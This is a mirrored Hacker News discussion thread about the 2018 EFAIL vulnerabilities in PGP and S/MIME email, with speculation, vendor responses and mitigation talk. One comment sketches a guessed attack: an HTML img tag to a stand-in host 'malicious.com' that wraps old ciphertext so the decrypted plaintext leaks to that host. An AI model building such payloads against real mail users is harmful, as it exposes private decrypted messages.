TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

A new set of vulnerabilities affecting users of PGP and S/MIME

288 pointsby rdhyeeabout 7 years ago

21 comments

fensipensabout 7 years ago
Response by Werner Koch (GPG), contains some details:<p><a href="https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;060315.html" rel="nofollow">https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;06031...</a>
评论 #17063910 未加载
评论 #17063765 未加载
评论 #17064179 未加载
bo1024about 7 years ago
Here&#x27;s a guess at what the &quot;attack&quot; might look like.<p>First, you need to know that each MIME email is made up of a series of subcomponents, which the email client interprets and concatenates. One subcomponent could be PGP encrypted while the next is not.<p>So given an old email where message X was encrypted to form a component Encr(X), simply write a new email of the form:<p><pre><code> Part 1: &lt;img src=http:&#x2F;&#x2F;malicious.com&#x2F;?q=&quot; Part 2: Encr(X) Part 3: &quot;&gt;</code></pre> Then the client might decrypt this to the message &lt;img src=&quot;http: &#x2F;&#x2F;malicious.com&#x2F;?q=X&quot;&gt;. Which is fine until the email client decides to automatically execute any code it happens to be given in an email, in this case, load the image.<p>To be clear, I doubt very much that this is the attack, but it sounds like it&#x27;s along these lines.
Anonionmanabout 7 years ago
What about Keybase[1] app, and Autocrypt[2],PEP[3]? Even dough Keybase is not email client, it can be used to continue to communicate with users that have PGP&#x2F;GPG keys, over their app. And Autocrypt is Thunderbird extension, and PEP is for Outlook and Android.<p><a href="https:&#x2F;&#x2F;mastodon.social&#x2F;web&#x2F;statuses&#x2F;100026482838593277" rel="nofollow">https:&#x2F;&#x2F;mastodon.social&#x2F;web&#x2F;statuses&#x2F;100026482838593277</a><p>[1]: <a href="https:&#x2F;&#x2F;keybase.io&#x2F;" rel="nofollow">https:&#x2F;&#x2F;keybase.io&#x2F;</a><p>[2]: <a href="https:&#x2F;&#x2F;autocrypt.org&#x2F;" rel="nofollow">https:&#x2F;&#x2F;autocrypt.org&#x2F;</a><p>[3]: <a href="https:&#x2F;&#x2F;www.pep.security&#x2F;" rel="nofollow">https:&#x2F;&#x2F;www.pep.security&#x2F;</a>
评论 #17065497 未加载
jstanleyabout 7 years ago
Given that they recommend against decrypting any email, it sounds like the bug is some sort of remote-code-execution against the decryption step, that would then allow (among ~anything else) exfiltration of keys, ciphertexts, and plaintexts.<p>EDIT: Having read a bit more I&#x27;m not so convinced that this explanation makes sense.
评论 #17063431 未加载
rdlabout 7 years ago
I&#x27;ve always handled PGP via cut-and-paste of the ascii armored block, through a text file on a ramdisk (or between systems), then using command-line pgp or gpg to decrypt, and the reverse. Not always on a VM or machine without external network access, but for signing keys for software and stuff, yes. It just seemed too easy to mess up auto-decrypt&#x2F;auto-encrypt and accidentally send out cleartext -- the cut and paste or textfile intermediate step makes it verifiable.<p>Unless there&#x27;s a protocol bug where the message itself can include &quot;dump the secret key to a public keyserver on decrypt&quot;, I&#x27;m not too worried.<p>(I also don&#x27;t use PGP for routine communications, because it&#x27;s so inconvenient to use it, and due to lack of a good mobile solution. Signal, or for routine email, tls to a mail server I control is fine too.)
评论 #17066208 未加载
评论 #17064024 未加载
keSSeajabout 7 years ago
&quot;They figured out mail clients which don&#x27;t properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S&#x2F;MIME has no deployed mitigation.&quot;<p>- by GnuPG (<a href="https:&#x2F;&#x2F;twitter.com&#x2F;gnupg&#x2F;status&#x2F;995931083584757760" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;gnupg&#x2F;status&#x2F;995931083584757760</a>)
评论 #17063917 未加载
jimrandomhabout 7 years ago
&gt; Our advice, which mirrors that of the researchers, is to immediately disable and&#x2F;or uninstall tools that automatically decrypt PGP-encrypted email.<p>This advice strongly suggests a side-channel attack, not anything which affects encrypted data at rest. The worst case is that PGP has a remote code execution vulnerability in the decryption step.
jwilkabout 7 years ago
This doesn&#x27;t make sense.<p>PGP is encryption software, whereas S&#x2F;MIME is an encryption standard.<p>It&#x27;s like saying that a vulnerability affetcts users of OpenSSL and RSA.
评论 #17063461 未加载
评论 #17063444 未加载
评论 #17063473 未加载
tasqaabout 7 years ago
This seems way overblown. An in-depth explanation Werner as to why this is most likely not an issue if you&#x27;re GPG is &gt; 2.1.9 [1]<p>An (older) example of expected behaviour [2].<p>[1] <a href="https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;060320.html" rel="nofollow">https:&#x2F;&#x2F;lists.gnupg.org&#x2F;pipermail&#x2F;gnupg-users&#x2F;2018-May&#x2F;06032...</a> [2] <a href="https:&#x2F;&#x2F;sourceforge.net&#x2F;p&#x2F;enigmail&#x2F;bugs&#x2F;538&#x2F;#43ff" rel="nofollow">https:&#x2F;&#x2F;sourceforge.net&#x2F;p&#x2F;enigmail&#x2F;bugs&#x2F;538&#x2F;#43ff</a>
runesoerensenabout 7 years ago
<i>&quot;Due to our embargo being broken, here are the full details of the #efail attacks. <a href="https:&#x2F;&#x2F;efail.de&#x2F;" rel="nofollow">https:&#x2F;&#x2F;efail.de&#x2F;</a> &quot;</i><p><a href="https:&#x2F;&#x2F;twitter.com&#x2F;seecurity&#x2F;status&#x2F;995964977461776385" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;seecurity&#x2F;status&#x2F;995964977461776385</a><p>Discussion <a href="https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=17064129" rel="nofollow">https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=17064129</a>
mFixmanabout 7 years ago
This is an email client vulnerability, not a PGP one. The obvious solution is to not use a client that autoloads HTML to decrypt your emails.
skunkworkerabout 7 years ago
I&#x27;m a little confused. Is this an attack on the PGP protocol or just an attack on the software implementation of PGP?<p>The advice they give seems to indicate that somehow a well-crafted payload can expose the secret PGP key from &quot;tools that automatically decrypt PGP-encrypted email.&quot;<p>This seems to me that it is an implementation-level attack and not a protocol attack on the basis for PGP. Is anyone else getting that same thought?
评论 #17063456 未加载
pdfernhoutabout 7 years ago
From an essay I wrote in 2015 on &quot;Why Encryption Use Is Problematical When Advocating For Social Change&quot;: <a href="http:&#x2F;&#x2F;pdfernhout.net&#x2F;why-encryption-use-is-problematical-when-advocating-for-social-change.html" rel="nofollow">http:&#x2F;&#x2F;pdfernhout.net&#x2F;why-encryption-use-is-problematical-wh...</a> &quot;In general, a system intended to ensure private communications is only as secure as its weakest link. If any of these levels is compromised (hardware, firmware, OS, application, algorithm theory, algorithm implementation, user error, user loyalty, etc.) then your communications are compromised. ... If you want to build a mass movement, at some point, you need to engage people. In practice, for social psychology reasons, engaging people is very difficult, if not impossible, to do completely anonymously in an untraceable way. People have historically built mass movements without computers or the internet. It&#x27;s not clear if the internet really makes this easier for activists or instead just for the status quo who wants to monitor them. If you work in public, you don&#x27;t have to fear loss of secure communications because you never structure your movement to rely on them. If you rely on &quot;secure&quot; communications, then you may set yourself up to fail when such communications are compromised. If your point is to build a mass movement, then where should your focus be? ...&quot;
dathinababout 7 years ago
I wouldn&#x27;t be surprised if this is either:<p>1. A bug in a library any pgp implementation uses, likely allowing even remote code execution<p>2. A bad Interaktion with some other mail &quot;extension&quot;* e.g. external bodies<p>*With extension I mean anything added to mail in a later rfc, which isn&#x27;t really an extension in the classical sense but I&#x27;m not sure what to call it otherwise
dredmorbiusabout 7 years ago
Any word on whether or not mutt is affected?
FrantaHabout 7 years ago
Ok, healthcare messaging in US is based on S&#x2F;MIME (<a href="http:&#x2F;&#x2F;wiki.directproject.org&#x2F;" rel="nofollow">http:&#x2F;&#x2F;wiki.directproject.org&#x2F;</a>). According to EFF, it should be shut down now?
zaarnabout 7 years ago
Yeah that sounds pretty bad. It is possibly some injection attack since it mentions automatic decryption of PGP. Or maybe some fundamental flaw in the formats... How exciting!
arca_voragoabout 7 years ago
My main question is does it affect gpg as well?
评论 #17063336 未加载
评论 #17063333 未加载
huwthecreatorabout 7 years ago
This seems like some code-execution thing. I suspect that the vulnerability executes a command when text is decrypted
newman314about 7 years ago
It&#x27;s not clear to me if PGP encrypted files are affected if it&#x27;s not email.
logicalleeabout 7 years ago
I think PGP should implement a centralized auto-update mechanism so that software can disable itself in cases as severe as listed (with advice to &quot;immediately disable and&#x2F;or uninstall tools that automatically decrypt PGP-encrypted email&quot;).<p>[I&#x27;ve removed an earlier longer version of this comment.]
评论 #17063346 未加载
评论 #17063364 未加载